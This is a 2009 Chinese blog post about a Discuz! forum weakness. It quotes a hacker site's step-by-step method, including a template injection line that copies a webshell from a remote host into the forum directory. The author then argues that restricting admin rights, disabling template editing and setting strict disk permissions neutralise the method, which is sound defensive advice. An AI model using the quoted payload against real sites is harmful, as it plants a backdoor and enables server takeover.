Discuz最近爆出来的拿Webshell安全漏洞

吸烟不如吸屁？吸屁还有三分米气！

今日起个人用户不能再申请ADSL宽带业务

2009年12月12日 20:54, cool, 资源分享, 评论(0), 引用(0), 阅读(1385)

大 | 中 | 小

随着个别纸质媒体，以及诸多“黑客类”站点的曝光，最近开始流行一个DZ的安全漏洞，关于这个安全漏洞，我摘抄自一黑客网站的说明如下：

Discuz!的最新后台拿Webshell 方法
1. 随便选一模板文件，选择编辑
2. 找一个空间上传一个webshell, 假定其地址为http://www.abc.com/shell.txt
3. 在任意位置输入:
{eval copy('http://www.abc.com/shell.txt', DISCUZ_ROOT.'./forumdata/shell.php');}
4. 保存, 刷新
5. 访问该模板所属的文件
6. 把模板恢复原样

大功告成, 访问/forumdata/shell.php便是可爱的马马。

这里跟大家稍微分享一下我看到这条新闻的时候想到的一些东西，希望对大家有帮助。

首先呢，就是这个漏洞被利用的两个前提，第一前提就是有后台权限，要这个权限不简单，DZ从之前较老的版本开始，就只有管理员权限的用户组能进后台了，而且，从7.2开始，对权限控制更加细化了，也就是说，我们完全可以控制进入后台的人具体拥有什么权限，上面漏洞是跟模板有关的，对于模板编辑，数据库操作等这些危险操作，日常安全加固的时候，我们就是应该对一般能进后台的人屏蔽掉的，本身一个论坛管理员就那么几个，再屏蔽掉一些人在危险功能上的权限，能编辑模板的，可能也就那么一两个账户了，安全性应该说是比较高的。第二个前提，就是必须要能编辑模板，DZ有个防陷落的理念，也就是把一些危险功能，在config.inc.php里面设置了，而后台没有控制按钮，比如说是否允许后台执行SQL，是否允许后台编辑模板，为了安全起见，DZ系统都是建议关闭这些功能的，编辑模板的功能关闭了，神仙进去了也完不成上面所谓的漏洞利用了。前提都不存在，无所谓漏洞被利用的说法了。

其次呢，我们要注意的就是磁盘权限的设置了，记得之前我写过一篇帖子，就是关于磁盘权限的，那个帖子里面就写得很清楚了，我们严格控制每个文件的可读可写权限，如果是独立服务器，我们使用单独账号运行每一个站点，运行PHP的站点，就把ASP等权限去掉。这些操作起来其实真的很简单的，你花一个小时，绝对全部设置好了。在这个磁盘权限设置好的基础上，我特意在自己的服务器上测试了一下，就算被写入了上面那个shell文件，能造成的危害也是非常有限的，而且一旦出事，排查起来也是非常简单的。

上面的两点呢，今天跟MJJ们聊天的时候，大家一致说到一个词，那就是安全意识，上面的两点，不需要任何的技术，纯粹就是一个安全意识的问题，如果你真的注意安全，做好了上面两点，那个所谓的漏洞也就不存在了。安全意识大于天啊。

没别的好说的，送个各位站长朋友一句话：良好的安全意识，会帮助你规避99%的安全问题！